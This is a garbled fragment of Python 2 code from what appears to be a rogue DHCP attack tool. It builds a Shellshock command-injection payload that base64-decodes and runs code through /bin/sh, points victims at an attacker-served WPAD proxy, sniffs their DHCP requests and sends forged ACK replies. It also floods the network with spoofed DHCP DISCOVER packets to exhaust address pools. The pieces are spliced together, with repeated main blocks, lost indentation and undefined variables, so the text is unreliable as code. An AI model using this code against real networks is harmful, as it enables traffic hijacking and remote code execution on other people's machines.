payload = b64encode(payload)
shellshock_url = "() { :" + "; }; /bin/sh <(/usr/bin/base64 -d <<< " + payload + ")"
if shellshock_url is not None:
if len(shellshock_url) > 255:
print "[ERROR] Len of command is very big! Current len: " + str(len(shellshock_url))
shellshock_url = "A"
global proxy
if args.proxy is None:
proxy = bytes("http://" + dhcp_server_ip_address + ":8080/wpad.dat")
else:
proxy = bytes(args.proxy)
ack_packet = make_dhcp_ack_packet(transaction_id, requested_ip)
sendp(ack_packet, iface=current_network_interface, verbose=False)
print "[INFO] Send ack response!"
if __name__ == "__main__":
if args.target_mac is None:
print "Waiting for a DHCP DISCOVER, DHCP REQUEST or DHCP INFORM ..."
sniff(lfilter=lambda d: d.src != eth.get_mac_for_dhcp_discover() and
d.src != Base.get_netiface_mac_address(current_network_interface),
filter="udp and src port 68 and dst port 67 and dst host 255.255.255.255",
prn=dhcp_reply, iface=current_network_interface)
else:
print "Waiting for a DHCP DISCOVER, DHCP REQUEST or DHCP INFORM from " + args.target_mac + " ..."
sniff(lfilter=lambda d: d.src == args.target_mac,
filter="udp and src port 68 and dst port 67",
prn=dhcp_reply, iface=current_network_interface)
count_percent = 0
print "Creating packets..."
if args.notspoofmac:
print " Your MAC address is not spoofed!"
eth = Ethernet_raw()
dhcp = DHCP_raw()
while count < count_max:
if args.notspoofmac:
SRC_MAC = current_mac_address
else:
SRC_MAC = eth.get_mac_for_dhcp_discover()
CLIENT_MAC = eth.get_random_mac()
HOST_NAME = Base.make_random_string(8)
current_packet = dhcp.make_discover_packet(SRC_MAC, CLIENT_MAC,
HOST_NAME)
PACKETS.append(current_packet)
count += 1
if count > count_percent:
stdout.flush()
stdout.write(" Complete: " + str(index_percent + 1) + "% \r")
index_percent += 1
count_percent = (count_max / 100) * index_percent
if __name__ == "__main__":
if args.target_ip is not None:
if args.target_mac is None:
print Base.c_error + "Please set target MAC address (--target_mac 00:AA:BB:CC:DD:FF)"
exit(1)
else:
print Base.c_info + "Waiting for ARP, DHCP DISCOVER, DHCP REQUEST or DHCP INFORM from " + args.target_mac
sniff(lfilter=lambda d: d.src == args.target_mac,
filter="arp or (udp and src port 68 and dst port 67)",
prn=dhcp_reply,
iface=current_network_interface)
else:
if args.target_mac is None:
print Base.c_info + "Waiting for a DHCP DISCOVER, DHCP REQUEST or DHCP INFORM"
sniff(
lfilter=lambda d: d.src != eth.get_mac_for_dhcp_discover(
) and d.src != Base.get_netiface_mac_address(
current_network_interface),
filter=
"udp and src port 68 and dst port 67 and dst host 255.255.255.255",
prn=dhcp_reply,
iface=current_network_interface)
else:
print Base.c_info + "Waiting for a DHCP DISCOVER, DHCP REQUEST or DHCP INFORM from " + args.target_mac
sniff(lfilter=lambda d: d.src == args.target_mac,
filter="udp and src port 68 and dst port 67",
prn=dhcp_reply,
iface=current_network_interface)
